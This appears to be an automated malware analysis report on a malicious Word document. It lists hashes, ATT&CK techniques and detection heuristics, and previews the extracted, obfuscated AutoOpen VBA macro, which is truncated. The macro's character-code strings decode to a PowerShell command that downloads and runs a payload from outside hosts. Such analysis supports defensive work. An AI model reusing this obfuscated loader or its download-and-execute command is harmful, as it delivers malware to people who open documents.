Office (OLE) malware analysis — malicious · 49a816a0ded1d9e5

MALICIOUS

Office (OLE)

243.2 KB Created: 2018-07-05 13:09:00 Authoring application: Microsoft Office Word First seen: 2018-07-18

MD5: 860418422c9d9eaea0a47fc45c953d75 SHA-1: 7964746baf37f64fc6588ff3344ca24003288a76 SHA-256: 49a816a0ded1d9e54a1412ffc42f75a7549a693935dba3a46265ee358949f831

342 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample contains an AutoOpen VBA macro that is obfuscated and uses CreateObject and Shell calls. The macro constructs and executes a PowerShell command to download and run a script from a remote URL. This indicates a downloader or droppers functionality, typical of initial stage malware.

Heuristics 9

ClamAV: Doc.Dropper.Agent-6602077-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6602077-0
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14825 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14825 bytes
SHA-256: `1e756a1e4cfadfd78706f66b05c912de57c1b3300479ec53a9cfc7e319b5e8bd`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "HCnbjzY" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next krmwDj = (11968 + iRHTmz * 36026 / zrTcKk / 46395 * qNTHw + ZhOHDa - OEGZmt) jLrCZ = (42197 + ZdiLu * 15060 / XjSwhi / 459 * ENrKb + jbqja - uXmYEo) XDHNGN = (86597 + rHMWNV * 69410 / NzGvRM / 17247 * diibiK + MAJHs - liaUbf) AjmNk = (88063 + TkzTj * 14823 / NwulsZ / 9141 * wrzlnN + XqTGY - mUjMf) jTpQpDdkj (CYYlO + DQLsilJD + jVKnmh + GpOPSqwE) lhQJMp = (89199 + tTrRi * 25441 / IuImG / 54431 * NiNSjV + Ddczud - injDz) fwwcC = (14509 + CiwzGN * 13534 / LPuttC / 76984 * UPpzwt + sXNzYQ - iZMpZL) End Sub Attribute VB_Name = "jhzOVMEvQZ" Function CYYlO() On Error Resume Next CdZJus = (huEwQ + QVqsM / ntfpt + PRPlf) / (26299 * 97904) WknmQt = (sRjbrk + ClMis / OjqHzW + TaBvv) / (58071 * 72781) EjknFiaSL = "wershell " + " " + " " + " " + Chr(40) + " [ChaR[]" + "] " + Chr(40) + " 3" + "6 ,8" + "3 , 1" + "09 ,82," + " 61, 110," + " 101 ," + " 119 ," tzYED = (rJYIS + PluVT / TrDOFB + XTvzOi) / (61636 * 78311) hJTvSk = (wVPWI + jdwinf / udvOu + NwBYA) / (76675 * 54347) iJitVU = (NsXHt + jFCRU / oWofn + bwvOrz) / (11979 * 10987) hVlmS = "45 , 11" + "1 ,9" + "8 ,1" + "06 ,101," + " 99 ,11" + "6 ,32" + " ,78" + " ,101 , 1" NwNknt = (TGcHRc + PoTwp / LEkjbi + lIkvi) / (15457 * 69621) kzKpj = (wapaGo + jVXmoF / iZuZF + Njojq) / (22535 * 20658) FibJCT = (GbGzN + ChNIC / isXIj + wMJZma) / (14336 * 2871) zsTYVMHzk = "16 ,46" + ",87,1" + "01 ," + " 98, 67" + " ,10" + "8, 105 ,1" + "01 ,110" + ", 116, " + "59,36 ," + " 73 " + ", 72 , 10" + "2 ,61 " icvEQ = (lluqLQ + fICwz / vvJka + SPUhrd) / (68498 * 54948) DSMlG = (zwqkbZ + WPVFlJ / dIIbL + WhdJs) / (95951 * 80804) NFwkwZHjNj = ", 39 , 10" + "4 , 11" + "6 , 11" + "6 ,112,58" + ", 47, " + "47,119" + " , 119, " + "119 ," + " 46," rREjD = (vzaBJ + AazdE / mRBpY + DcTLYX) / (11253 * 5690) KjtbsX = (lAtIC + GuAfT / UrVIz + QDCMc) / (77160 * 11613) BUDmzwbh = "102,116 " + ",112," + "46, 10" + "4 ,111," + "109, 101 " + ",115" + " , 50" VhIrq = (JuRGsM + GpAajf / NjnPpr + StLiGV) / (35155 * 69702) cwvQw = (svHoK + dFjXf / cOCtI + bEkaCv) / (12044 * 9061) QMRtaa = " ,115,10" + "1,10" + "1 ,46 " + ",99, 1" + "11 ," + "109, 47" ckFIcB = (OOikBV + ZDzlu / CzEqBF + mrXVo) / (71772 * 74289) MqbYBqsrfW = ", 105" + " , 110," + " 116 ,11" + "4 , 97," + "110,101" + " , 116, 4" + "7,80, 5" + "5 , 50," + " 57,56, " + "88,68 ," fIQbWu = (JQMFZ + XjPAi / YwkIb + mBlbG) / (94780 * 4612) FGlcac = (hrpMj + UwHWl / fOGWdA + qIwQi) / (28345 * 58489) vTrEMkcF = "116 " + ", 10" + "0, 47 " + ", 64," + " 104, 11" + "6, 11" + "6,112" + " ,58" MmatRI = (TlbCI + CQSuhh / EAjlmh + nfnlmh) / (63523 * 622) qXdSA = (rjEwRV + YNmGj / zRmWt + OwBsZL) / (61311 * 67430) zGKGl = (zGQvw + kQBikP / uvAoYj + XiJPDZ) / (53392 * 9218) lUjHNFmB = ",47, 47" + " ,119 , 1" + "19 , 119" + ", 46 ,11" + "9, 1" + "04,97 ," CYYlO = EjknFiaSL + hVlmS + zsTYVMHzk + NFwkwZHjNj + BUDmzwbh + QMRtaa + MqbYBqsrfW + vTrEMkcF + lUjHNFmB bNcJPc = (ivKNR + cFTuHb / qCPswE + PbOsq) / (22958 * 15507) lOQFjW = (LYWmlj + ozrfWX / incPiG + MUJXJS) / (2295 * 94816) FqISlS = (FKzcGQ + BAnMCp / jSUow + PbEBPm) / (14776 * 52704) End Function Function DQLsilJD() On Error Resume Next NETTI = (ijzlr + UNOiLL / EwmhC + NpnIVR) / (14046 * 880) iOLali = (jvZjRp + tVwtZ / jKKPnD + RWFmYw) / (47640 * 30618) hpRzBWN = "114,102,1" + "04, 1" + "11,116, " + "101,1" + "08 ,98,97" + ",115 , " GdHEd = (QcJsQX + cUJjtG / jCkSH + YjSsjb) / (60104 * 89999) kOYNzQ = (MLzPO + DMLmJR / oisoLM + FTnOzV) / (6115 * 54566) iMuXAR = (ZMNpdG + FUNcn / nahvB + HspnOF) / (78803 * 75270) KkLubM = (ThhjK + omJWKh / sozkM + KRLoss) / (92658 * 77253) GdaGji = (RpSBrX + lNvoTa / RpvOr + cUjwO) / (56747 * 50977) IiFnhGkdZ = "115 ,97" + " ,10 ... (truncated)

SHA-256: 1e756a1e4cfadfd78706f66b05c912de57c1b3300479ec53a9cfc7e319b5e8bd

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "HCnbjzY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
   krmwDj = (11968 + iRHTmz * 36026 / zrTcKk / 46395 * qNTHw + ZhOHDa - OEGZmt)
   jLrCZ = (42197 + ZdiLu * 15060 / XjSwhi / 459 * ENrKb + jbqja - uXmYEo)
   XDHNGN = (86597 + rHMWNV * 69410 / NzGvRM / 17247 * diibiK + MAJHs - liaUbf)
   AjmNk = (88063 + TkzTj * 14823 / NwulsZ / 9141 * wrzlnN + XqTGY - mUjMf)
jTpQpDdkj (CYYlO + DQLsilJD + jVKnmh + GpOPSqwE)
   lhQJMp = (89199 + tTrRi * 25441 / IuImG / 54431 * NiNSjV + Ddczud - injDz)
   fwwcC = (14509 + CiwzGN * 13534 / LPuttC / 76984 * UPpzwt + sXNzYQ - iZMpZL)
End Sub


Attribute VB_Name = "jhzOVMEvQZ"
Function CYYlO()
On Error Resume Next
CdZJus = (huEwQ + QVqsM / ntfpt + PRPlf) / (26299 * 97904)
   WknmQt = (sRjbrk + ClMis / OjqHzW + TaBvv) / (58071 * 72781)
EjknFiaSL = "wershell " + "        " + "    " + "      " + Chr(40) + " [ChaR[]" + "] " + Chr(40) + " 3" + "6 ,8" + "3 , 1" + "09 ,82," + " 61, 110," + " 101 ," + " 119 ,"
tzYED = (rJYIS + PluVT / TrDOFB + XTvzOi) / (61636 * 78311)
   hJTvSk = (wVPWI + jdwinf / udvOu + NwBYA) / (76675 * 54347)
   iJitVU = (NsXHt + jFCRU / oWofn + bwvOrz) / (11979 * 10987)
hVlmS = "45 , 11" + "1 ,9" + "8 ,1" + "06 ,101," + " 99 ,11" + "6 ,32" + " ,78" + " ,101 , 1"
NwNknt = (TGcHRc + PoTwp / LEkjbi + lIkvi) / (15457 * 69621)
   kzKpj = (wapaGo + jVXmoF / iZuZF + Njojq) / (22535 * 20658)
   FibJCT = (GbGzN + ChNIC / isXIj + wMJZma) / (14336 * 2871)
zsTYVMHzk = "16 ,46" + ",87,1" + "01 ," + " 98, 67" + " ,10" + "8, 105 ,1" + "01 ,110" + ", 116, " + "59,36 ," + " 73 " + ", 72 , 10" + "2 ,61 "
icvEQ = (lluqLQ + fICwz / vvJka + SPUhrd) / (68498 * 54948)
   DSMlG = (zwqkbZ + WPVFlJ / dIIbL + WhdJs) / (95951 * 80804)
NFwkwZHjNj = ", 39 , 10" + "4 , 11" + "6 , 11" + "6 ,112,58" + ", 47, " + "47,119" + " , 119, " + "119 ," + " 46,"
rREjD = (vzaBJ + AazdE / mRBpY + DcTLYX) / (11253 * 5690)
   KjtbsX = (lAtIC + GuAfT / UrVIz + QDCMc) / (77160 * 11613)
BUDmzwbh = "102,116 " + ",112," + "46, 10" + "4 ,111," + "109, 101 " + ",115" + " , 50"
VhIrq = (JuRGsM + GpAajf / NjnPpr + StLiGV) / (35155 * 69702)
   cwvQw = (svHoK + dFjXf / cOCtI + bEkaCv) / (12044 * 9061)
QMRtaa = " ,115,10" + "1,10" + "1 ,46 " + ",99, 1" + "11 ," + "109, 47"
ckFIcB = (OOikBV + ZDzlu / CzEqBF + mrXVo) / (71772 * 74289)
MqbYBqsrfW = ", 105" + " , 110," + " 116 ,11" + "4 , 97," + "110,101" + " , 116, 4" + "7,80, 5" + "5 , 50," + " 57,56, " + "88,68 ,"
fIQbWu = (JQMFZ + XjPAi / YwkIb + mBlbG) / (94780 * 4612)
   FGlcac = (hrpMj + UwHWl / fOGWdA + qIwQi) / (28345 * 58489)
vTrEMkcF = "116 " + ", 10" + "0, 47 " + ", 64," + " 104, 11" + "6, 11" + "6,112" + " ,58"
MmatRI = (TlbCI + CQSuhh / EAjlmh + nfnlmh) / (63523 * 622)
   qXdSA = (rjEwRV + YNmGj / zRmWt + OwBsZL) / (61311 * 67430)
   zGKGl = (zGQvw + kQBikP / uvAoYj + XiJPDZ) / (53392 * 9218)
lUjHNFmB = ",47, 47" + " ,119 , 1" + "19 , 119" + ", 46 ,11" + "9, 1" + "04,97 ,"
CYYlO = EjknFiaSL + hVlmS + zsTYVMHzk + NFwkwZHjNj + BUDmzwbh + QMRtaa + MqbYBqsrfW + vTrEMkcF + lUjHNFmB
   bNcJPc = (ivKNR + cFTuHb / qCPswE + PbOsq) / (22958 * 15507)
   lOQFjW = (LYWmlj + ozrfWX / incPiG + MUJXJS) / (2295 * 94816)
   FqISlS = (FKzcGQ + BAnMCp / jSUow + PbEBPm) / (14776 * 52704)
End Function
Function DQLsilJD()
On Error Resume Next
NETTI = (ijzlr + UNOiLL / EwmhC + NpnIVR) / (14046 * 880)
   iOLali = (jvZjRp + tVwtZ / jKKPnD + RWFmYw) / (47640 * 30618)
hpRzBWN = "114,102,1" + "04, 1" + "11,116, " + "101,1" + "08 ,98,97" + ",115 , "
GdHEd = (QcJsQX + cUJjtG / jCkSH + YjSsjb) / (60104 * 89999)
   kOYNzQ = (MLzPO + DMLmJR / oisoLM + FTnOzV) / (6115 * 54566)
   iMuXAR = (ZMNpdG + FUNcn / nahvB + HspnOF) / (78803 * 75270)
   KkLubM = (ThhjK + omJWKh / sozkM + KRLoss) / (92658 * 77253)
   GdaGji = (RpSBrX + lNvoTa / RpvOr + cUjwO) / (56747 * 50977)
IiFnhGkdZ = "115 ,97" + " ,10
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.